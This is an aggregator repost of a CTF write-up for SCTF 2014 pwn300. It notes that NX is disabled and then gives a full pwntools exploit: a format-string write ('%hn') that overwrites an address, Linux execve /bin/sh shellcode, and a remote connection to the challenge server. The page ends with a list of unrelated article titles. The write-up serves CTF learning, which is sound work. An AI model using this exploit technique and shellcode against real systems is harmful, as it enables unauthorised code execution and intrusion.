sctf 2014 pwn300
来源:互联网 发布:linux运维会被云取代吗 编辑:程序博客网 时间:2024/05/18 08:30
关键:nx没开, cat /proc/[pid]/maps bss,data所属段可执行
from pwn import *
shellcode="\x31\xc0\x31\xd2\x31\xdb\x31\xc9\x31\xc0\x31\xd2\x52\x68\x2f\x2f" \
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x31\xc0\xb0" \
"\x0b\xcd\x80\n"
p=remote("218.2.197.235",10102)
print p.readuntil("input your choice:\n")
p.sendline('2')
print p.readuntil("input your message\n")
payload="\x20\x91\x04\x08"
payload+="%37248c%7$hn"
p.sendline(payload)
p.readuntil("input your choice:\n")
p.sendline("3")
p.readuntil("input your choice:\n")
p.sendline("2")
p.readuntil("input your message\n")
p.send(shellcode)
p.readuntil("input your choice:\n")
p.sendline("4")
p.interactive()
贴个pwntool formatstring的bug图片
- sctf 2014 pwn300
- SCTF-RE200破解笔记
- 【SCTF&&CCTF 2016】 PWN_WRITEUP
- HITCTF PWN300--dynelf
- 2017湖湘杯pwn300的wp
- 2017 429 ichunqiu ctf smallest(pwn300) writeup
- 2014
- 2014
- 2014
- 2014
- 2014
- 2014
- 2014
- 2014
- 2014
- 2014
- 2014
- 2014
- Oracle数据库程序包全局变量的应用
- Android studio设置requestWindowFeature(Window.FEATURE_NO_TITLE);出错
- 简单理解设计模式之工厂模式
- 使用List的时候会将对象全部取出
- 崩溃后程序保持运行状态而不退出
- sctf 2014 pwn300
- 异或算法在算法求解中的妙用
- Linux 下编译Android-VLC开源播放器详解(附源码下载)
- 数据链路层常见威胁与防御技术
- 第三周 项目 3 求合集并集(补)
- js 放大镜
- win 32Api获取系统内存函数
- 搭建Vagrant的Debian8的base box
- Android 读取SD卡中文件以及内存使用情况